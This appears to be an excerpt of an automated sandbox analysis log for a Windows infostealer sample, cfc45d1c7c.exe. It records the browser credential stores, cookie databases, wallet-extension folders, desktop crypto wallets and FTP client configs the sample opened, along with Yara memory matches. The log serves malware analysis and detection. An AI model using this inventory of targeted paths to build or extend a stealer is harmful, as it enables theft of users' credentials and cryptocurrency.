Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live.
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: Yara match File source: 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2693505617.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
